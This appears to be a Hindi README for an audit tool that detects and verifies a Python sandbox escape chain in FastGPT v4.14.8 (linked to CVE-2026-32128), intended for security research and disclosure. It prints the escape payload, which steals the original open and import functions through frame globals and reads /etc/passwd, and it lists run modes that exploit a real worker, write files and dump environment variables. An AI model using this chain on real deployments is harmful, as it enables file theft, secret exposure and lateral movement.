
FastGPT Python सैंडबॉक्स एस्केप चेन ऑडिट टूल (CVE-2026-32128 से संबंधित, v4.14.8 इंस्पेक्ट चेन)
FastGPT Python सैंडबॉक्स एस्केप चेन ऑडिट टूल।
FastGPT वर्कफ़्लो का "कोड रन" नोड उपयोगकर्ता के Python कोड को एक अलग सैंडबॉक्स में निष्पादित करता है। v4.14.8 की सैंडबॉक्स सुरक्षा शुद्ध Python परत है (मॉड्यूल ब्लैकलिस्ट + AST जाँच + open गार्ड + import गार्ड), यह टूल इन सुरक्षाओं की बायपास श्रृंखला का पता लगाता है और सत्यापित करता है:
import inspect # inspect _DANGEROUS_STDLIB ब्लैकलिस्ट में नहीं है
g = inspect.currentframe().f_back.f_globals # AST जाँच सिंगल-अंडरस्कोर फ्रेम एट्रिब्यूट को नहीं रोकती
f = g['_original_open'](https://github.com/qianlijaingshan/fastgpt-sandbox-audit/blob/HEAD/%27/etc/passwd%27) # मॉड्यूल ग्लोबल मूल open रेफरेंस उजागर करता है
imp = g['_original_import'] # मॉड्यूल ग्लोबल मूल __import__ रेफरेंस उजागर करता है
| संस्करण | आर्किटेक्चर | स्थिति |
|---|---|---|
| v4.14.7 | NestJS + Fastify + seccomp | CVE-2026-32128 (stdout का fcntl रीमैपिंग) |
| v4.14.8 | Bun + Hono + worker.py | इस लेख की एस्केप चेन, पूर्ण एस्केप (कंटेनर के भीतर मनमाना फ़ाइल + नेटवर्क लेटरल मूवमेंट) |
| main | Go native chroot + seccomp | Python परत भी बायपास होती है, chroot फ़ॉलबैक कंटेनर के भीतर सीमित करता है |
शुद्ध मानक पुस्तकालय, Python 3.8+।
# worker.py सुरक्षा कॉन्फ़िगरेशन की स्थिर जाँच (payload निष्पादित नहीं करता)
python3 fastgpt-sandbox-audit.py --check
# वास्तविक worker.py पर पूर्ण एस्केप चेन चलाएँ (/etc/passwd पढ़ें + फ़ाइल लिखें)
python3 fastgpt-sandbox-audit.py --exploit
# पर्यावरण चर निर्यात करें (पहले 20 key)
python3 fastgpt-sandbox-audit.py --dump
# worker.py पथ निर्दिष्ट करें
python3 fastgpt-sandbox-audit.py --worker /path/to/worker.py --exploit
--exploit को एक वास्तविक worker.py (FastGPT v4.14.8 सैंडबॉक्स की Python worker प्रक्रिया) की आवश्यकता होती है, यह डिफ़ॉल्ट रूप से वर्तमान निर्देशिका से ./worker.py पढ़ता है, और अपने स्वयं के stdin JSON प्रोटोकॉल ({"type":"init"} → {"type":"task","code":...}) के माध्यम से payload सबमिट करता है।
--check मोड आउटपुट:
=== fastgpt-sandbox-audit: सुरक्षा कॉन्फ़िगरेशन जाँच ===
[जोखिम] inspect _DANGEROUS_STDLIB ब्लैकलिस्ट में नहीं है -> import किया जा सकता है
[जोखिम] AST जाँच f_globals एट्रिब्यूट को नहीं रोकती
[जोखिम] मॉड्यूल ग्लोबल _original_open उजागर करता है -> f_globals द्वारा चुराया जा सकता है
[जोखिम] मॉड्यूल ग्लोबल _original_import उजागर करता है -> f_globals द्वारा चुराया जा सकता है
[सूचना] worker.py में seccomp नहीं है (4.14.8+ शुद्ध Python सुरक्षा)
यह टूल केवल सुरक्षा अनुसंधान और अधिकृत दायरे के भीतर सुरक्षा परीक्षण के लिए है। बिना अधिकार के दूसरों के सिस्टम का परीक्षण करना कानून और विनियमों का उल्लंघन हो सकता है, कृपया संबंधित जिम्मेदारी स्वयं वहन करें।